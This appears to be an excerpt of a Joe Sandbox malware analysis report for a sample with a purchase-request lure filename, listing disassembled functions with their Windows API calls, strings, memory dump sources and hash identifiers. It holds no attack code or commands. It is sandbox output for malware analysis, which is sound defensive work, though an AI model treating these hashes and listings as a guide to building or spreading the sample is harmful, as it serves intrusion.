                                              • Instruction ID: 73590bd3bd4da25c6282f4962bba1f4dead6bbda0de50ea026f8fcef5c7c58fe
                                              • Opcode Fuzzy Hash: 900e23fd7b9ba6ba72b608b4d8bb7afdaad734be64e21c77cf2c7d5b253b3323
                                              • Instruction Fuzzy Hash: 5C51CE301883419FC714EF54C891AAAB7A5EF94310F95482DF496A72A2DB71DD0ACB93
                                              Function 001688B4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0016896E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID: @U=u
                                              • API String ID: 634782764-2594219639
                                              • Opcode ID: aefc78534f97c49c152704aec443efb404f3077009cbbb02adddd6d071099d68
                                              • Instruction ID: 28e7a617edc3c18e9b0ecfacc0d3e8c58c35e7e25e37b54c18f05c3147d0fd0b
                                              • Opcode Fuzzy Hash: aefc78534f97c49c152704aec443efb404f3077009cbbb02adddd6d071099d68
                                              • Instruction Fuzzy Hash: FD51C530600208BFDF349F68CC85BA97B69FF05314F604616FA11E75A1DFB1A9A0CB91
                                              Function 000E2B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0011C547
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0011C569
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0011C581
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0011C59F
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0011C5C0
                                              • DestroyIcon.USER32(00000000), ref: 0011C5CF
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0011C5EC
                                              • DestroyIcon.USER32(?), ref: 0011C5FB
                                                • Part of subcall function 0016A71E: DeleteObject.GDI32(00000000), ref: 0016A757
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                              • String ID: @U=u
                                              • API String ID: 2819616528-2594219639
                                              • Opcode ID: cc2d4375d1f9b84c36c40e3be4cd7a1aba08b9bd27680e1a1058cd44a01de4b5
                                              • Instruction ID: 108e2f360f8f6f9e0a8ec3d2aecb7daf09e54dedfa30773bb332650da8a747e3
                                              • Opcode Fuzzy Hash: cc2d4375d1f9b84c36c40e3be4cd7a1aba08b9bd27680e1a1058cd44a01de4b5
                                              • Instruction Fuzzy Hash: 6D515970640349EFDB24DF25DC45FAA37B9EB54310F104528F902A76A0DBB0ED91DBA0
                                              Function 000E9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: 2303fe81068e4eca5a9afb2580c1b1dddb90c2dd9f507fd068dc6d3e49a9b5ef
                                              • Instruction ID: 5d9f348f6bc11c84800e8e74b05d5e6f7d6852b5e4e856ced159c0c7f6d658ba
                                              • Opcode Fuzzy Hash: 2303fe81068e4eca5a9afb2580c1b1dddb90c2dd9f507fd068dc6d3e49a9b5ef
                                              • Instruction Fuzzy Hash: 5841C671504209AFDB28EB39D842F7AB3E8EF44304F24447EF589D7292EB719942CB51
                                              Function 001673C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 001673D9
                                              • CreateMenu.USER32 ref: 001673F4
                                              • SetMenu.USER32(?,00000000), ref: 00167403
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00167490
                                              • IsMenu.USER32(?), ref: 001674A6
                                              • CreatePopupMenu.USER32 ref: 001674B0
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001674DD
                                              • DrawMenuBar.USER32 ref: 001674E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: c9d8cea2bf1af4123e93ad842a2ffd38a99da1424045588b3a28525c4d88df47
                                              • Instruction ID: 94cf00284a1deaf3606fe928608935752bd11f5aa9910b58d4878f7bd1bd8efd
                                              • Opcode Fuzzy Hash: c9d8cea2bf1af4123e93ad842a2ffd38a99da1424045588b3a28525c4d88df47
                                              • Instruction Fuzzy Hash: AB414975A01209EFDB10DF68EC48AAABBB9FF49304F144029F956973A0DB74AD60CF50
                                              Function 00139471 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001394F6
                                              • GetDlgCtrlID.USER32 ref: 00139501
                                              • GetParent.USER32 ref: 0013951D
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00139520
                                              • GetDlgCtrlID.USER32(?), ref: 00139529
                                              • GetParent.USER32(?), ref: 00139545
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00139548
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 1536045017-2258501812
                                              • Opcode ID: 188468d8e8819d85d8ac96933723a1d2c850726599256d54f0e46230c3daa1fe
                                              • Instruction ID: 91c918cfd67626468e29025bfcbcbd40b750b579c95f8f46f63b460c7430e700
                                              • Opcode Fuzzy Hash: 188468d8e8819d85d8ac96933723a1d2c850726599256d54f0e46230c3daa1fe
                                              • Instruction Fuzzy Hash: D321C170904204BFDF05AB65DC85DFEBB78EF49300F11012AF962972A2EBB55959DB20
                                              Function 0013955C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001395DF
                                              • GetDlgCtrlID.USER32 ref: 001395EA
                                              • GetParent.USER32 ref: 00139606
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00139609
                                              • GetDlgCtrlID.USER32(?), ref: 00139612
                                              • GetParent.USER32(?), ref: 0013962E
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00139631
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 1536045017-2258501812
                                              • Opcode ID: 5f58a1cf5da039d89dff14e6030b0be20814a05832b79797f0a3051d0018a514
                                              • Instruction ID: fcace5e68e4df62f03ffa3158eeb52859e572e463edce1030d7b369a1c43e6c3
                                              • Opcode Fuzzy Hash: 5f58a1cf5da039d89dff14e6030b0be20814a05832b79797f0a3051d0018a514
                                              • Instruction Fuzzy Hash: CD21F9B4900204BFDF05AB65CCC5EFEBB78EF58300F15002AF921971A2DBB59959DB20
                                              Function 00139645 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32 ref: 00139651
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00139666
                                              • _wcscmp.LIBCMT ref: 00139678
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001396F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-1428604138
                                              • Opcode ID: 34f9fa4f3e1554426940896074ad600d0a13c6b6a98a39bebb7e4ffe3983c69c
                                              • Instruction ID: e696cfbd3afd60717240db40d9498952596432fdfe5667e8ab9fc0d2f6d04e5e
                                              • Opcode Fuzzy Hash: 34f9fa4f3e1554426940896074ad600d0a13c6b6a98a39bebb7e4ffe3983c69c
                                              • Instruction Fuzzy Hash: FC1148B7649307BAFA052625EC0BDA7779CCB14370F21002BF910A50E2FFE269518A98
                                              Function 00107040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 0010707B
                                                • Part of subcall function 00108D68: __getptd_noexit.LIBCMT ref: 00108D68
                                              • __gmtime64_s.LIBCMT ref: 00107114
                                              • __gmtime64_s.LIBCMT ref: 0010714A
                                              • __gmtime64_s.LIBCMT ref: 00107167
                                              • __allrem.LIBCMT ref: 001071BD
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001071D9
                                              • __allrem.LIBCMT ref: 001071F0
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0010720E
                                              • __allrem.LIBCMT ref: 00107225
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00107243
                                              • __invoke_watson.LIBCMT ref: 001072B4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                              • Instruction ID: 574bf22de3e0fedf4b457c0f9734d8ac6de181795d6453eb4a047936d2e88c0a
                                              • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                              • Instruction Fuzzy Hash: A071E971E04717ABE718AE79CC41BAAB3A8AF65724F14423AF554E72C1E7B0F94087D0
                                              Function 00142A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00142A31
                                              • GetMenuItemInfoW.USER32(001A6890,000000FF,00000000,00000030), ref: 00142A92
                                              • SetMenuItemInfoW.USER32(001A6890,00000004,00000000,00000030), ref: 00142AC8
                                              • Sleep.KERNEL32(000001F4), ref: 00142ADA
                                              • GetMenuItemCount.USER32(?), ref: 00142B1E
                                              • GetMenuItemID.USER32(?,00000000), ref: 00142B3A
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00142B64
                                              • GetMenuItemID.USER32(?,?), ref: 00142BA9
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00142BEF
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00142C03
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00142C24
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: 66a187d65b5e553eb32544e61524033cc790763dbc882baca867068f8509dca8
                                              • Instruction ID: 9e578d0864c68301dc305eee9cb9ed6c3e1bf45e9921e8c2bd279e8307c03317
                                              • Opcode Fuzzy Hash: 66a187d65b5e553eb32544e61524033cc790763dbc882baca867068f8509dca8
                                              • Instruction Fuzzy Hash: 9761A2B0900249AFDB21CF64DC88EBEBBB8FB51304F940569F84297261D771ADC6DB21
                                              Function 00167192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00167214
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00167217
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0016723B
                                              • _memset.LIBCMT ref: 0016724C
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0016725E
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001672D6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 58db5233346cf3592758fecdaa09322c1af9ce16f462092374df67be016cb017
                                              • Instruction ID: 48549f08a1c2239e3c20809344a1381802a5ca2df4ef2f1e48992e9fab8fa339
                                              • Opcode Fuzzy Hash: 58db5233346cf3592758fecdaa09322c1af9ce16f462092374df67be016cb017
                                              • Instruction Fuzzy Hash: 31617975A00208AFDB10DFA4CC81EEEB7B8AB09704F14415AFA15A73E1D774A951DB60
                                              Function 0013710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00137135
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 0013718E
                                              • VariantInit.OLEAUT32(?), ref: 001371A0
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 001371C0
                                              • VariantCopy.OLEAUT32(?,?), ref: 00137213
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00137227
                                              • VariantClear.OLEAUT32(?), ref: 0013723C
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00137249
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00137252
                                              • VariantClear.OLEAUT32(?), ref: 00137264
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0013726F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 40231dfeb18ecf114421debfe39369c9b0f7d1f4eeba0481c1142c3d75f35094
                                              • Instruction ID: ca15c2b80bf25c6ac3af02e940685ee1ae8f5acbd6d224eef9c4bae22a5238d4
                                              • Opcode Fuzzy Hash: 40231dfeb18ecf114421debfe39369c9b0f7d1f4eeba0481c1142c3d75f35094
                                              • Instruction Fuzzy Hash: 1F415E75A04219AFCF14DFA8DC489EEBBB8FF48354F008069F915A7661CB70A946CB90
                                              Function 0016D74C Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • GetSystemMetrics.USER32(0000000F), ref: 0016D78A
                                              • GetSystemMetrics.USER32(0000000F), ref: 0016D7AA
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0016D9E5
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0016DA03
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0016DA24
                                              • ShowWindow.USER32(00000003,00000000), ref: 0016DA43
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0016DA68
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0016DA8B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID: @U=u
                                              • API String ID: 1211466189-2594219639
                                              • Opcode ID: 90642a6964b9f882fe715e806c1fe7266f1224dad9a2b22db1ff168722699a85
                                              • Instruction ID: 6108394ae86c68b98d6b400d4458604f708b21aceef7f05804bc46b7f886579a
                                              • Opcode Fuzzy Hash: 90642a6964b9f882fe715e806c1fe7266f1224dad9a2b22db1ff168722699a85
                                              • Instruction Fuzzy Hash: 78B19971A04225EFDF18CF68D9897BD7BB1FF08705F098069EC499B295D734A9A0CB90
                                              Function 001586D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • CoInitialize.OLE32 ref: 00158718
                                              • CoUninitialize.OLE32 ref: 00158723
                                              • CoCreateInstance.OLE32(?,00000000,00000017,00172BEC,?), ref: 00158783
                                              • IIDFromString.OLE32(?,?), ref: 001587F6
                                              • VariantInit.OLEAUT32(?), ref: 00158890
                                              • VariantClear.OLEAUT32(?), ref: 001588F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: 64b9a82efffbe7257b6c014ed643540511d63a84e837602b06b162ec7faa5394
                                              • Instruction ID: aa2a255e8982b846bd674626a8727e3dadbfb75376aba8feb60cce36bb519cc7
                                              • Opcode Fuzzy Hash: 64b9a82efffbe7257b6c014ed643540511d63a84e837602b06b162ec7faa5394
                                              • Instruction Fuzzy Hash: 9461BE70608311EFD710DF24C849B6ABBE8EF88715F10481DF9A5AB291CB70ED48CB92
                                              Function 000E2E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 000E2EAE
                                                • Part of subcall function 000E1DB3: GetClientRect.USER32(?,?), ref: 000E1DDC
                                                • Part of subcall function 000E1DB3: GetWindowRect.USER32(?,?), ref: 000E1E1D
                                                • Part of subcall function 000E1DB3: ScreenToClient.USER32(?,?), ref: 000E1E45
                                              • GetDC.USER32 ref: 0011CF82
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0011CF95
                                              • SelectObject.GDI32(00000000,00000000), ref: 0011CFA3
                                              • SelectObject.GDI32(00000000,00000000), ref: 0011CFB8
                                              • ReleaseDC.USER32(?,00000000), ref: 0011CFC0
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0011D04B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: @U=u$U
                                              • API String ID: 4009187628-4110099822
